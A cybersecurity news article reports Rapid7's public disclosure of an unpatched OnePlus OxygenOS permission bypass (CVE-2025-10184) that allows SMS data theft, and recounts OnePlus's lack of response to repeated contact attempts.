Login
iscover
Share this article on:
Powered by
MOMENTUM
MEDIA
Powered by MOMENTUMMEDIA
Several OnePlus smartphones running OxygenOS were found to have an unfixed permission bypass vulnerability that could lead to theft of SMS data.
Security researchers at Rapid7 have found a permission bypass vulnerability in several versions of Android smartphones produced by device maker OnePlus.
Alarmingly, however, Rapid7 has said it is unable to coordinate a proper disclosure process with OnePlus, due to the latter’s restrictive terms and conditions in relation to its bug bounty program.
“While OnePlus does advertise a public bug bounty program for reporting vulnerabilities, Rapid7 cannot engage with their bug bounty program due to its restrictive non-disclosure agreement (NDA) terms and conditions,” Rapid7 said in a 23 September blog post.
“Therefore CVE-2025-10184 is being disclosed as not fixed by the vendor at the time of disclosure.”
The issue affects a raft of devices running multiple versions of OxygenOS and is present in two OnePlus handsets. Sensitive internal content providers on the devices can be accessed without permission, leaving them vulnerable to SQL injection.
This, according to Rapid7, could lead a threat actor to bypass core Android permissions to extract SMS data without user consent.
“At this particular moment in time, surveillance-related vulnerabilities and threats are of strong interest to many governments and threat actors,” Rapid7 said.
“A wide-reaching issue like this could be a boon to both state-sponsored adversaries looking to surveil victims and authoritarian regimes looking to oppress political dissidence.”
The vulnerability is present in both OnePlus 8T running versions 12 of the OS and OnePlus 10 Pro 5G devices running versions 14 and 15. The vulnerability does not appear to be present in OxygenOS 11, leading researchers to believe that the issue was introduced in version 12 of the OS. Rapid7 believes the issue is not hardware-related.
Rapid7 first made contact with the OnePlus Security Response Center in May, but did not receive a response. Rapid7 made two more attempts to contact OnePlus, and in early July, the company’s support team said the issue would be raised internally, but again, no response was received.
More contact attempts were made in July and August, leading Rapid7 to make contact with phone maker OPPO, which has a business relationship with OnePlus, but, again, this attempt was met with silence.
“Rapid7 considers OnePlus a non-responsive vendor and publicly discloses CVE-2025-10184 via this disclosure blog post,” Rapid7 said.
Cyber Daily has reached out to OnePlus for comment.
David Hollingworth has been writing about technology for over 20 years, and has worked for a range of print and online titles in his career. He is enjoying getting to grips with cyber security, especially when it lets him talk about Lego.
Be the first to hear the latest developments in the cyber industry.
